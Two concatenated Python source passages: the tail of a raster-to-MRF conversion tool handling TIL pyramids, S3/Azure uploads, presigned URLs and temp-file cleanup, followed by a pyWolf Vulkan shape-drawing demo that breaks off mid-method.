if (not til.isAllFilesProcessed(_til)):
if (_doPostProcessing):
self._base.message(
'TIL> Not yet completed for ({})'.format(_til))
if (til.isAllFilesProcessed(_til)):
til_output_path = til.getOutputPath(_til)
if (_doPostProcessing):
if (not til_output_path):
self._base.message(
'TIL output-path returned empty/Internal error', self._base.const_warning_text)
continue
if (not til.defaultTILProcessing):
ret = comp.createaOverview(til_output_path)
if (not ret):
self._base.message('Unable to build pyramids on ({})'.format(
til_output_path), self._base.const_warning_text)
continue
tilOutputExtension = 'mrf'
# keys in TIL._tils_info are in lowercase.
tilsInfoKey = _til.lower()
ret = comp.compress('{}{}'.format(til_output_path, '.ovr' if not til.defaultTILProcessing else ''), '{}.{}'.format(
til_output_path, tilOutputExtension), args_Callback, name=til_output_path)
if (not ret):
self._base.message('Unable to convert (til.ovr=>til.mrf) for file ({}.ovr)'.format(
til_output_path), self._base.const_warning_text)
continue
try:
# remove all the internally referenced (raster/tiff) files by the .TIL file that are no longer needed post conversion.
if (til.defaultTILProcessing):
for associate in til._tils_info[tilsInfoKey][TIL.CKEY_FILES]:
processedPath = os.path.join(
os.path.dirname(til_output_path), associate)
try:
os.remove(processedPath)
except Exception as e:
self._base.message(
str(e), self._base.const_critical_text)
continue
else:
# let's rename (.mrf) => (.ovr)
os.remove('{}.ovr'.format(til_output_path))
os.rename('{}.mrf'.format(
til_output_path), '{}.ovr'.format(til_output_path))
except Exception as e:
self._base.message('({})'.format(
str(e)), self._base.const_warning_text)
continue
# update .ovr file updates at -clonepath
try:
if (self._args.clonepath):
_clonePath = til_output_path.replace(self._args.output if not self._args.tempoutput or (
self._args.tempoutput and not self._base.getBooleanValue(self._args.cloudupload)) else self._args.tempoutput, '')
_mk_input_path = os.path.join(
self._args.clonepath, '{}.mrf'.format(_clonePath))
doc = minidom.parse(_mk_input_path)
xmlString = doc.toxml()
xmlString = xmlString.replace(
'.mrf<', '.ovr<')
xmlString = xmlString.replace('.{}'.format(
CCACHE_EXT), '.ovr.{}'.format(CCACHE_EXT))
_indx = xmlString.find(
'<{}>'.format(CMRF_DOC_ROOT))
if (_indx == -1):
raise Exception(
'Err. Invalid MRF/header')
xmlString = xmlString[_indx:]
_mk_save_path = '{}{}.ovr'.format(
self._args.clonepath, _clonePath.replace('.mrf', ''))
with open(_mk_save_path, 'w+') as _fpOvr:
_fpOvr.write(xmlString)
except Exception as e:
self._base.message('Unable to update .ovr for [{}] ({})'.format(
til_output_path, str(e)), self._base.const_warning_text)
continue
# ends
# upload (til) related files (.idx, .ovr, .lrc)
if (is_cloud_upload and
S3_storage):
ret = S3_storage.upload_group(
'{}.CHS'.format(til_output_path))
retry_failed_lst = []
failed_upl_lst = S3_storage.getFailedUploadList()
if (failed_upl_lst):
[retry_failed_lst.append(
_x['local']) for _x in failed_upl_lst['upl']]
# let's delete all the associate files related to (TIL) files.
if (self._base.getBooleanValue(cfg.getValue(COUT_DELETE_AFTER_UPLOAD))):
(p, n) = os.path.split(til_output_path)
for r, d, f in os.walk(p):
for file in f:
if (r != p):
continue
mk_filename = os.path.join(
r, file).replace('\\', '/')
if (til.fileTILRelated(mk_filename)):
# Don't delete files included in the (failed upload list)
if (mk_filename in retry_failed_lst):
continue
try:
self._base.message(
'[Del] {}'.format(mk_filename))
os.remove(mk_filename)
except Exception as e:
self._base.message('[Del] Err. {} ({})'.format(
mk_filename, str(e)), self._base.const_critical_text)
# ends
# ends
# ends
# block to deal with caching ops.
if (is_caching and
do_pyramids != CCMD_PYRAMIDS_ONLY):
if (not g_is_generate_report):
self._base.message('\nProcessing caching operations...')
if (not isinput_s3):
raster_buff = []
if (cfg_mode == 'splitmrf'): # set explicit (exclude list) for mode (splitmrf)
list['exclude']['idx'] = ''
ret = cpy.init(self._args.input, self._args.output,
list, callbacks_for_meta, cfg)
if (not ret):
self._base.message(
CONST_CPY_ERR_0, self._base.const_critical_text)
return(terminate(self._base, eFAIL))
ret = cpy.processs(
pre_processing_callback=fn_pre_process_copy_default)
if (not ret):
self._base.message(
CONST_CPY_ERR_1, self._base.const_critical_text)
return(terminate(self._base, eFAIL))
if (g_is_generate_report and
g_rpt):
for req in raster_buff:
(input_file, output_file) = getInputOutput(
req['src'], req['dst'], req['f'], isinput_s3)
_src = '{}{}{}'.format(req['src'], '/' if not req['src'].replace(
'\\', '/').endswith('/') and req['src'] != '' else '', req['f'])
g_rpt.addFile(_src)
self._base.message('{}'.format(
CRESUME_CREATE_JOB_TEXT).format(_project_path))
# Uploading is disabled for modes related to caching.
self._args.cloudupload = 'false'
for arg in vars(self._args):
g_rpt.addHeader(arg, getattr(self._args, arg))
g_rpt.write()
if (self.isOperationCreateJob):
return self.__initOperationCreateJob()
self._args.op = None
# preserve the original -input path
cfg.setValue(CCMD_ARG_INPUT, self._args.input)
self._args.input = _project_path
cfg.setValue(CLOAD_RESTORE_POINT, True)
self.run()
return
makedirs(self._args.output) # prepare output dirs.
len_buffer = cfg_threads
threads = []
store_files_indx = 0
store_files_len = len(raster_buff)
while(1):
len_threads = len(threads)
while(len_threads):
alive = [t.is_alive() for t in threads]
cnt_dead = sum(not x for x in alive)
if (cnt_dead):
len_buffer = cnt_dead
threads = [t for t in threads if t.is_alive()]
break
buffer = []
for i in range(0, len_buffer):
if (store_files_indx == store_files_len):
break
buffer.append(raster_buff[store_files_indx])
store_files_indx += 1
if (not buffer and
not threads):
break
setPreAssignedURL = False
# enabled only for 'amazon' for now.
if (cloudDownloadType == Store.TypeAmazon):
if (isinput_s3 and
o_S3_storage is not None):
setPreAssignedURL = True
elif(cloudDownloadType == Store.TypeAzure):
if (isinput_s3 and
in_azure_storage is not None):
setPreAssignedURL = True
for f in buffer:
try:
if (setPreAssignedURL):
preAkey = '{}{}'.format(f['src'], f['f'])
if (cloudDownloadType == Store.TypeAmazon):
if (self._base.getBooleanValue(self._base.getUserConfiguration.getValue(UseToken))):
resp = o_S3_storage.con.meta.client.get_object(Bucket=o_S3_storage.m_bucketname, Key=preAkey) # , Range='bytes={}-{}'.format(0, 4))
self._args.preFetchedMRF = resp['Body'].read()
else:
self._args.preAssignedURL = o_S3_storage.con.meta.client.generate_presigned_url(
'get_object', Params={'Bucket': o_S3_storage.m_bucketname, 'Key': preAkey})
else:
if (not cfg.getValue(CFGAZSAS)):
from azure.storage.blob import ResourceTypes, AccountSasPermissions, generate_account_sas
SAS = generate_account_sas(in_azure_storage._blob_service.account_name, in_azure_storage._blob_service.credential.account_key, resource_types=ResourceTypes(object=True),
permission=AccountSasPermissions(
read=True),
expiry=datetime.utcnow() + timedelta(hours=1))
self._args.preAssignedURL = '{}/{}/{}?{}'.format(
in_azure_storage._account_name, in_s3_bucket, preAkey, SAS)
t = threading.Thread(target=threadProxyRaster, args=(
f, self._base, comp, self._args))
t.daemon = True
t.start()
threads.append(t)
except Exception as e:
self._base.message('Err. {}'.format(
str(e)), self._base.const_critical_text)
continue
# do we have failed upload files on list?
if (is_cloud_upload and
S3_storage):
if (cfg.getValue(COUT_CLOUD_TYPE) == CCLOUD_AMAZON):
failed_upl_lst = S3_storage.getFailedUploadList()
if (failed_upl_lst):
self._base.message(
'Retry - Failed upload list.', const_general_text)
_fptr = None
if (self._log_path):
try:
if (not os.path.isdir(self._log_path)):
makedirs(self._log_path)
ousr_date = datetime.now()
err_upl_file = os.path.join(self._log_path, '%s_UPL_ERRORS_%04d%02d%02dT%02d%02d%02d.txt' % (cfg.getValue(CPRJ_NAME, False), ousr_date.year, ousr_date.month, ousr_date.day,
ousr_date.hour, ousr_date.minute, ousr_date.second))
_fptr = open(err_upl_file, 'w+')
except BaseException:
pass
for v in failed_upl_lst['upl']:
self._base.message(
'%s' % (v['local']), const_general_text)
ret = S3_storage.upload_group(v['local'])
# the following files will be logged as unsuccessful uploads to output cloud
if (not ret):
if (_fptr):
_fptr.write('{}\n'.format(v['local']))
if (_rpt): # Do we have an input file list?
if ('local' in v):
_local = v['local']
if (_local):
setUploadRecordStatus(_local, CRPT_NO)
# ends
for r in ret:
try:
self._base.message('[Del] {}'.format(r))
try:
os.remove(r)
except BaseException:
time.sleep(CDEL_DELAY_SECS)
os.remove(r)
except Exception as e:
self._base.message(
'[Del] {} ({})'.format(r, str(e)))
if (_fptr):
_fptr.close()
_fptr = None
# ends
# let's clean-up rasters @ -tempinput path
if (is_input_temp and
not is_caching): # if caching is (True), -tempinput is ignored and no deletion of source @ -input takes place.
if (len(raster_buff) != 0):
self._base.message('Removing input rasters at ({})'.format(
cfg.getValue(CTEMPINPUT, False)))
for req in raster_buff:
doRemove = True
(input_file, output_file) = getInputOutput(
req['src'], req['dst'], req['f'], isinput_s3)
try:
if (_rpt):
if (_rpt.getRecordStatus('{}{}'.format(req['src'], req['f']), CRPT_PROCESSED) == CRPT_NO):
doRemove = False
if (doRemove and
os.path.exists(input_file)):
self._base.message('[Del] {}'.format(input_file))
os.remove(input_file)
except Exception as e:
self._base.message('[Del] {} ({})'.format(
input_file, str(e)), self._base.const_warning_text)
if (_rpt and
doRemove):
primaryExt = _rpt._m_rasterAssociates.findExtension(
input_file)
if (primaryExt):
raInfo = _rpt._m_rasterAssociates.getInfo()
if (raInfo and
primaryExt in raInfo):
self._base.message(
'Removing associated files for ({})'.format(input_file))
for relatedExt in raInfo[primaryExt].split(';'):
try:
_mkPrimaryRaster = '{}{}'.format(
input_file[:len(input_file) - len(primaryExt)], relatedExt)
if (os.path.exists(_mkPrimaryRaster)):
self._base.message(
'[Del] {}'.format(_mkPrimaryRaster))
os.remove(_mkPrimaryRaster)
except Exception as e:
self._base.message('[Del] {} ({})'.format(
_mkPrimaryRaster, str(e)), self._base.const_warning_text)
self._base.message('Done.')
# ends
if (not raster_buff):
# it's possible to have empty {CCFG_RASTERS_NODE} raster extensions. e.g configs for op=copyonly
if (len(cfg.getValue(CCFG_RASTERS_NODE))):
self._base.message(
'No input rasters to process..', self._base.const_warning_text)
# ends
_status = eOK
# write out the (job file) with updated status.
if (_rpt):
if (not _rpt.write() or
_rpt.hasFailures()):
_status = eFAIL
if (_status == eOK):
if (not CRUN_IN_AWSLAMBDA):
_status = self._moveJobFileToLogPath()
timeReport = self._args.timeit
if (timeReport):
# write the execution time details report
_rpt.writeTimeItReport(timeReport)
# ends
# write out the raster proxy .csv file
if (self._base._isRasterProxyFormat('csv')):
pfname = cfg.getValue('rpfname', False)
if (pfname):
with open(pfname, 'a') as rpWriter:
rpWriter.write('ObjectID;Raster\n')
for i in range(0, len(self._base._modifiedProxies)):
proxyStr = self._base._modifiedProxies[i]
proxyStr = ' '.join(
proxyStr.split()).replace('"', '\'')
proxyStr = '><'.join(proxyStr.split('> <'))
rpWriter.write('{};{}\n'.format(i + 1, proxyStr))
# ends
self._base.message('Done..\n')
return(terminate(self._base, _status))
def _moveJobFileToLogPath(self):
global _rpt
global cfg
if (self._base is None or
_rpt is None):
return eFAIL
status = eOK
txtInConfig = 'KeepLogFile'
txtInRPT = txtInConfig.lower()
if (self._base.getMessageHandler is None):
return status
if (self._base.getBooleanValue(cfg.getValue(txtInConfig))):
return status
if (txtInRPT in _rpt._header):
if (self._base.getBooleanValue(_rpt._header[txtInRPT])):
return status
defLogFolder = self._base.getMessageHandler.logFolder
# client apps can override the LogPath in the template.
usrLogFolder = self._base.getUserConfiguration.getValue(CFGLogPath)
if (not _rpt.moveJobFileToPath(defLogFolder if usrLogFolder is None else usrLogFolder)):
self._base.message(
'Unable to move the .orjob file to the log path.', self._base.const_warning_text)
status = eFAIL
return status
def threadProxyRaster(req, base, comp, args):
usrConfig = base.getUserConfiguration
(inputFile, outputFile) = getInputOutput(
req['src'], req['dst'], req['f'], base.getBooleanValue(args.clouddownload))
(f, ext) = os.path.splitext(req['f'])
rptName = os.path.join(req['src'], req['f'])
if (not base.getBooleanValue(usrConfig.getValue('KeepExtension'))):
outputFile = outputFile.replace(ext, CONST_OUTPUT_EXT)
finalPath = outputFile
isTempOut = base.getBooleanValue(usrConfig.getValue(CISTEMPOUTPUT))
if (isTempOut):
finalPath = outputFile.replace(args.tempoutput, args.output)
mode = usrConfig.getValue('Mode')
bytesAtHeader = None
isInputMRF = False
if (mode != 'splitmrf'):
if (mode == 'rasterproxy'):
# Determine file type by reading few bytes off its header.
sigMRF = '<{}>'.format(CMRF_DOC_ROOT.lower())[
:4] # mrf XML root node
# reading as small as possble to determine the correct type to avoid large data transfers for bigger .orjob files.
sigMRFLength = len(sigMRF)
remoteURL = None
isPreFetchedMRF = True if (hasattr(
args, 'preFetchedMRF') and args.preFetchedMRF is not None) else False
bytesAtHeader = args.preFetchedMRF[:sigMRFLength] if isPreFetchedMRF else None
if (not isPreFetchedMRF):
if (inputFile.startswith(CVSICURL_PREFIX)):
dnVSICURL = inputFile.split(CVSICURL_PREFIX)[1]
remoteReader = None
remoteURL = args.preAssignedURL if (hasattr(
args, 'preAssignedURL') and args.preAssignedURL is not None) else dnVSICURL
try:
remoteReader = urlopen(remoteURL)
bytesAtHeader = remoteReader.read(sigMRFLength)
except Exception as e:
base.message(str(e), base.const_critical_text)
if (_rpt):
_rpt.updateRecordStatus(
rptName, CRPT_PROCESSED, CRPT_NO)
return False
finally:
if (remoteReader):
remoteReader.close()
else:
try:
with open(inputFile, 'rb') as fptrProxy:
bytesAtHeader = fptrProxy.read(sigMRFLength)
except Exception as e:
base.message(str(e), base.const_critical_text)
if (_rpt):
_rpt.updateRecordStatus(
rptName, CRPT_PROCESSED, CRPT_NO)
return False
if (bytesAtHeader):
mode = 'cachingmrf'
if (isinstance(bytesAtHeader, bytes)):
try:
bytesAtHeader = bytesAtHeader.decode('utf-8')
except BaseException:
pass # ignore any invalid start byte issues.
if (bytesAtHeader.lower() == sigMRF):
isInputMRF = True
mode = 'clonemrf'
contents = None
if (inputFile.startswith(CVSICURL_PREFIX)):
remoteReader = None
try:
contents = args.preFetchedMRF if isPreFetchedMRF else contents
if (not isPreFetchedMRF):
remoteReader = urlopen(remoteURL)
contents = remoteReader.read()
if (not base._isRasterProxyFormat('csv')):
with open(outputFile, 'wb') as writer:
writer.write(contents)
srcPyramids = contents.find(b'<Rsets') != -1
if (_rpt):
ret = _rpt.addMetadata(
rptName, 'isuniformscale', srcPyramids)
except Exception as e:
base.message(str(e), base.const_critical_text)
if (_rpt):
_rpt.updateRecordStatus(
rptName, CRPT_PROCESSED, CRPT_NO)
return False
finally:
if (remoteReader):
remoteReader.close()
else:
try:
with open(inputFile, 'rb') as proxyReader:
contents = proxyReader.read()
if (contents is not None):
if (isInputMRF):
if (not base._isRasterProxyFormat('csv')):
with open(outputFile, 'wb') as writer:
writer.write(contents)
srcPyramids = contents.find(
b'<Rsets') != -1
if (_rpt):
ret = _rpt.addMetadata(
inputFile, 'isuniformscale', srcPyramids)
except Exception as e:
base.message(str(e), base.const_critical_text)
if (_rpt):
_rpt.updateRecordStatus(
rptName, CRPT_PROCESSED, CRPT_NO)
return False
if (contents is not None):
if (contents.find(b'<Compression>LERC') == -1):
mode = 'cachingmrf'
# ends
if (not isInputMRF):
ret = comp.compress(inputFile, outputFile, args_Callback_for_meta,
post_processing_callback=fn_copy_temp_dst if isTempOut else None, name=rptName)
else:
try:
shutil.copyfile(inputFile, finalPath)
except Exception as e:
base.message('[CPY] {} ({})'.format(
inputFile, str(e)), base.const_critical_text)
return False
if (not os.path.exists(finalPath)):
if (not base._isRasterProxyFormat('csv')):
return False
# update .mrf.
updateMRF = UpdateMRF(base)
homePath = args.output
inputMRF = finalPath
if (isInputMRF):
homePath = req['src']
if (not isPreFetchedMRF):
inputMRF = inputFile
if (args.clouddownload and
inputFile.startswith(CVSICURL_PREFIX)):
if (not isPreFetchedMRF):
inputMRF = remoteURL
if (updateMRF.init(inputMRF, args.output, mode,
args.cache, homePath, usrConfig.getValue(COUT_VSICURL_PREFIX, False))):
if (not updateMRF.update(finalPath, trueInput=inputFile)):
base.message('Updating ({}) was not successful!'.format(
finalPath), base.const_critical_text)
return False
# ends
# remove ancillary extension files that are no longer required for (rasterproxy) files on the client side.
errorEntries = RasterAssociates.removeRasterProxyAncillaryFiles(finalPath)
if (errorEntries):
for err in errorEntries:
base.message('Unable to delete ({})'.format(
err), base.const_warning_text)
# ends
return True
def main():
optional = '[Optional]'
parser = argparse.ArgumentParser()
parser.add_argument(
'-mode', help='Processing mode/output format', dest='mode')
parser.add_argument(
'-input', help='Input raster files directory/job file to resume', dest=CRESUME_HDR_INPUT)
parser.add_argument('-output', help='Output directory',
dest=CRESUME_HDR_OUTPUT)
parser.add_argument(
'-subs', help='Include sub-directories in -input? [true/false]', dest='subs')
parser.add_argument('-cache', help='cache output directory', dest='cache')
parser.add_argument(
'-config', help='Configuration file with default settings', dest='config')
parser.add_argument(
'-quality', help='JPEG quality if compression is jpeg', dest='quality')
parser.add_argument('-prec', help='LERC precision', dest='prec')
parser.add_argument(
'-pyramids', help='Generate pyramids? [true/false/only/external]', dest='pyramids')
parser.add_argument(
'-tempinput', help='{} Path to copy -input raters before conversion'.format(optional), dest=CTEMPINPUT)
parser.add_argument(
'-tempoutput', help='Path to output converted rasters before moving to (-output) path. {} This is only required if -cloudupload is (true)'.format(optional), dest=CTEMPOUTPUT)
parser.add_argument(
'-clouddownload', help='Is -input a cloud storage? [true/false: default:false]', dest='clouddownload')
parser.add_argument(
'-cloudupload', help='Is -output a cloud storage? [true/false]', dest='cloudupload')
parser.add_argument('-clouduploadtype', choices=['amazon', 'azure', 'google'],
help='Upload Cloud Type [amazon/azure]', dest='clouduploadtype')
parser.add_argument('-clouddownloadtype', choices=['amazon', 'azure', 'google'],
help='Download Cloud Type [amazon/azure/google]', dest='clouddownloadtype')
parser.add_argument(
'-inputprofile', help='Input cloud profile name with credentials', dest=InputProfile)
parser.add_argument(
'-outputprofile', help='Output cloud profile name with credentials', dest=OutputProfile)
parser.add_argument(
'-inputbucket', help='Input cloud bucket/container name', dest='inputbucket')
parser.add_argument(
'-outputbucket', help='Output cloud bucket/container name', dest='outputbucket')
parser.add_argument('-op', help='Utility operation mode [{}/{}/{}/{}/{}]'.format(
COP_UPL, COP_NOCONVERT, COP_LAMBDA, COP_COPYONLY, COP_CREATEJOB), dest=Report.CHDR_OP)
parser.add_argument(
'-job', help='Name output job/log-prefix file name', dest='job')
parser.add_argument('-hashkey', help='Hashkey for encryption to use in output paths for cloud storage. e.g. -hashkey=random@1. This will insert the encrypted text using the -hashkey (\'random\') as the first folder name for the output path', dest=CUSR_TEXT_IN_PATH)
parser.add_argument(
'-rasterproxypath', help='{} Path to auto-generate raster proxy files during the conversion process'.format(optional), dest='rasterproxypath')
parser.add_argument(
'-clonepath', help='Deprecated. Use (-rasterproxypath)', dest='clonepath')
parser.add_argument(
'-s3input', help='Deprecated. Use (-clouddownload)', dest='s3input')
parser.add_argument(
'-s3output', help='Deprecated. Use (-cloudupload)', dest='s3output')
parser.add_argument('-queuelength', type=int,
help='No of simultaneous rasters to process in lambda function. To use with -op=lambda', dest=Lambda.queue_length)
parser.add_argument(
'-usetoken', help='Use token to access cloud data? [true/false: default:false]', dest=UseToken)
parser.add_argument(
'-timeit', help='Execution time details report', dest=CTimeIt)
args = parser.parse_args()
app = Application(args)
# app.registerMessageCallback(messageDebug)
if (not app.init()):
return eFAIL
jobStart = datetime.now()
status = app.run()
duration = (datetime.now() - jobStart).total_seconds()
print('Time taken> {}s'.format(duration))
return status
if __name__ == '__main__':
ret = main()
print('\nDone..')
exit(ret)
|
15_shapes.py | import sys, os
#get path of script
_script_path = os.path.realpath(__file__)
_script_dir = os.path.dirname(_script_path)
pyWolfPath = _script_dir
if sys.platform == "linux" or sys.platform == "linux2":
print "Linux not tested yet"
elif sys.platform == "darwin":
print "OS X not tested yet"
elif sys.platform == "win32":
pyWolfPath = pyWolfPath + "\\..\\..\\..\\..\\bin\\x64\\Debug\\Win32\\"
if pyWolfPath != "" and (not pyWolfPath in sys.path):
sys.path.append(pyWolfPath)
import ctypes, threading, pyWolf
from math import cos, sin
from PySide import QtGui, QtCore
from PySide.QtGui import *
from PySide.QtCore import *
screen_width = 800
screen_height = 600
class gui(QWidget):
def __init__(self, parent=None):
super(gui, self).__init__(parent)
self.debug_text = ""
self._label = QLabel()
self._label.setAlignment(Qt.AlignLeft)
vbox = QVBoxLayout()
vbox.addWidget(self._label)
self.setLayout(vbox)
timer = QTimer(self)
timer.timeout.connect(self.updateTime)
timer.start(50)
def updateTime(self):
self._label.setText(self.debug_text)
class scene(QWidget):
def __init__(self, pContentPath, pLogPath, pAppName, parent = None):
super(scene, self).__init__(parent)
self.__exiting = False
self._game = pyWolf.framework.w_game(pContentPath, pLogPath, pAppName)
self._game.set_pre_init_callback(self.pre_init)
self._game.set_post_init_callback(self.post_init)
self._game.set_load_callback(self.load)
self._game.set_update_callback(self.update)
self._game.set_pre_render_callback(self.pre_render)
self._game.set_post_render_callback(self.post_render)
self._gDevice = None
self._viewport = pyWolf.graphics.w_viewport()
self._viewport_scissor = pyWolf.graphics.w_viewport_scissor()
self._draw_command_buffers = pyWolf.graphics.w_command_buffers()
self._draw_render_pass = pyWolf.graphics.w_render_pass()
self._draw_fence = pyWolf.graphics.w_fences()
self._draw_semaphore = pyWolf.graphics.w_semaphore()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._shape_line = pyWolf.graphics.w_shapes(
pyWolf.glm.vec3(0.0, 0.0, 0.0),
pyWolf.glm.vec3(3.0, 3.0, 3.0),
pyWolf.system.w_color.RED())
self._shape_triangle = pyWolf.graphics.w_shapes(
pyWolf.glm.vec3(-1.0, 0.0, 0.0),
pyWolf.glm.vec3(1.0, 0.0, 0.0),
pyWolf.glm.vec3(0.0, 2.0, 0.0),
pyWolf.system.w_color.GREEN())
self._shape_circle = pyWolf.graphics.w_shapes(
pyWolf.glm.vec3(0.0, 0.0, 0.0),
2.0,
pyWolf.system.w_color.ORANGE(),
pyWolf.system.w_plane.XY,
30)
_bounding_box = pyWolf.system.w_bounding_box()
_bounding_box.min = pyWolf.glm.vec3(-3.0, -3.0, -3.0)
_bounding_box.max = pyWolf.glm.vec3(3.0, 3.0, 3.0)
self._shape_box = pyWolf.graphics.w_shapes(_bounding_box, pyWolf.system.w_color.YELLOW())
_bounding_sphere = pyWolf.system.w_bounding_sphere()
_bounding_sphere.center = pyWolf.glm.vec3(0.0, 0.0, 0.0)
_bounding_sphere.radius = 3.0
_sphere_resolution = 30
self._shape_sphere = pyWolf.graphics.w_shapes(_bounding_sphere, pyWolf.system.w_color.PURPLE(), _sphere_resolution)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_config = pyWolf.graphics.w_graphics_device_manager_configs()
_config.debug_gpu = False
self._game.set_graphics_device_manager_configs(_config)
def pre_init(self):
print "pre_init"
def post_init(self):
#get main graphics device
self._gDevice = self._game.get_graphics_device(0)
print self._gDevice.get_info()
print "post_init"
def load(self):
#initialize viewport
self._viewport.y = 0
self._viewport.width = screen_width
self._viewport.height = screen_height
self._viewport.minDepth = 0
self._viewport.maxDepth = 1
#initialize scissor of viewport
self._viewport_scissor.offset.x = 0
self._viewport_scissor.offset.y = 0
self._viewport_scissor.extent.width = screen_width
self._viewport_scissor.extent.height = screen_height
#load render pass which contains frame buffers
_render_pass_attachments = []
_output_window = self._gDevice.output_presentation_window
for _iter in _output_window.swap_chain_image_views:
# COLOR #DEPTH
_render_pass_attachments.append([_iter, _output_window.depth_buffer_image_view])
_hr = self._draw_render_pass.load(self._gDevice, self._viewport, self._viewport_scissor, _render_pass_attachments)
if _hr:
print "Error on loading render pass"
self.release()
sys.exit(1)
#create one semaphore for drawing
_hr = self._draw_semaphore.initialize(self._gDevice)
if _hr:
print "Error on initializing semaphore"
self.release()
sys.exit(1)
#create one fence for drawing
_hr = self._draw_fence.initialize(self._gDevice, 1)
if _hr:
print "Error on initializing fence(s)"
self.release()
sys.exit(1)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_hr = self._shape_line.load(
self._gDevice,
self._draw_render_pass,
self._viewport,
self._viewport_scissor)
if _hr:
print "Error on loading shape line axis"
self.release()
sys.exit(1)
_hr = self._shape_triangle.load(
self._gDevice,
self._draw_render_pass,
self._viewport,
self._viewport_scissor)
if _hr:
print "Error on loading shape triangle axis"
self.release()
sys.exit(1)
_hr = self._shape_circle.load(
self._gDevice,
self._draw_render_pass,
self._viewport,
self._viewport_scissor)
if _hr:
print "Error on loading shape circle axis"
self.release()
sys.exit(1)
_hr = self._shape_box.load(
self._gDevice,
self._draw_render_pass,
self._viewport,
self._viewport_scissor)
if _hr:
print "Error on loading shape box axis"
self.release()
sys.exit(1)
_hr = self._shape_sphere.load(
self._gDevice,
self._draw_render_pass,
self._viewport,
self._viewport_scissor)
if _hr:
print "Error on loading shape shpere axis"
self.release()
sys.exit(1)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#create command buffers for drawing
number_of_swap_chains = self._gDevice.get_number_of_swap_chains()
_hr = self._draw_command_buffers.load(self._gDevice, number_of_swap_chains, pyWolf.graphics.w_command_buffer_level.PRIMARY)
if _hr:
print "Error on initializing draw command buffer(s)"
self.release()
sys.exit(1)
_hr = self.build_command_buffers()
if _hr:
print "Error on building command buffers"
self.release()
sys.exit(1)
print "scene loaded successfully"
def build_command_buffers(self):
_hr = pyWolf.W_PASSED
_size = self._draw_command_buffers.get_commands_size()
for i in xrange(_size):
_cmd = self._draw_command_buffers.get_command_at(i)
_hr = self._draw_command_buffers.begin(i)
if _hr:
print "Error on begining command buffer: " + str(i)
break
self._draw_render_pass.begin(i, _cmd, pyWolf.system.w_color.CORNFLOWER_BLUE(), 1.0, 0)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._shape_line.draw(_cmd)
self._shape_triangle.draw(_cmd)
self._shape_circle.draw(_cmd)
self._shape_box.draw(_cmd)
self._shape_sphere.draw(_cmd)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._draw_render_pass.end(_cmd)
_hr = self._draw_command_buffers.end(i)
if _hr:
print "Error on ending command buffer: " + str(i)
break
return _hr
def update(self, pGameTime):
#Update label of gui widget
global _gui
_gui.debug_text = "FPS: " + str(pGameTime.get_frames_per_second()) + "\r\n\r\nFrameTime: " + str(pGameTime.get_elapsed_seconds()) + "\r\n\r\nTotalTime: " + str(pGameTime.get_total_seconds())
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_pi = 3.14159265
_angle = pGameTime.get_total_seconds()
_eye = pyWolf.glm.vec3(cos(_angle * 0.5) * 15.0, 0.5 * 15.0, sin(_angle * 0.5) * 15.0)
_up = pyWolf.glm.vec3(0.0, -1.0, 0.0)
_look_at = pyWolf.glm.vec3(0.0, 0.0, 0.0)
_world = pyWolf.glm.mat4x4()
_view = pyWolf.lookAtRH(_eye, _look_at, _up)
_projection = pyWolf.perspectiveRH(
45.0 * _pi / 180.0,
self._viewport.width / self._viewport.height,
0.1,
1000.0)
_vp = pyWolf.multiply_matrices(_projection,_view)
_wvp = pyWolf.multiply_matrices(_vp,_world)
_hr = self._shape_line.update(_wvp)
if _hr:
print "Error on updating shape line"
_hr = self._shape_triangle.update(_wvp)
if _hr:
print "Error on updating shape triangle"
_hr = self._shape_circle.update(_wvp)
if _hr:
print "Error on updating shape circle"
_hr = self._shape_box.update(_wvp)
if _hr:
print "Error on updating shape box"
_hr = self._shape_sphere.update(_wvp)
if _hr:
print "Error on updating shape sphere"
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
def pre_render(self, pGameTime):
_output_window = self._gDevice.output_presentation_window
_frame_index = _output_window.swap_chain_image_index
_wait_dst_stage_mask = [ pyWolf.graphics.w_pipeline_stage_flag_bits.COLOR_ATTACHMENT_OUTPUT_BIT ]
_wait_semaphores = [ _output_window.swap_chain_image_is_available_semaphore ]
_signal_semaphores = [ _output_window.rendering_done_semaphore ]
_cmd = self._draw_command_buffers.get_command_at(_frame_index)
#reset draw fence
self._draw_fence.reset()
_hr = self._gDevice.submit(
[_cmd],
self._gDevice.graphics_queue,
_wait_dst_stage_mask,
_wait_semaphores,
_signal_semaphores,
self._draw_fence)
if _hr:
print "Error on submiting queue for final drawing"
return
_hr = self._draw_fence.wait()
if _hr:
print "Error on waiting for draw fence"
return
def post_render(self, pSuccessfullyRendered):
if pSuccessfullyRendered == False:
print "Rendered Unsuccessfully"
def run(self):
#run game
_window_info = pyWolf.system.w_window_info()
_window_info.width = self.width()
_window_info.height = self.height()
_window_info.v_sync_enable = False
_window_info.is_full_screen = False
_window_info.swap_chain_format = 44 # BGRA8Unorm in VULKAN
_window_info.cpu_access_swap_chain_buffer = False
# get window handle
pycobject_hwnd = self.winId()
#convert window handle as HWND to unsigned integer pointer for c++
ctypes.pythonapi.PyCObject_AsVoidPtr.restype = ctypes.c_void_p
ctypes.pythonapi.PyCObject_AsVoidPtr.argtypes = [ctypes.py_object]
int_hwnd = ctypes.pythonapi.PyCObject_AsVoidPtr(pycobject_hwnd)
_window_info.set_win_id(int_hwnd)
#initialize game
_map_info = (0, _window_info)
while True:
if self.__exiting:
self.release()
break
self._game.run(_map_info)
print "Game exited"
def showEvent(self, event):
#run in another thread
threading.Thread(target=self.run).start()
event.accept()
def closeEvent(self, event):
self.__exiting = True
event.accept()
def keyPressEvent(self, event):
_key = event.key()
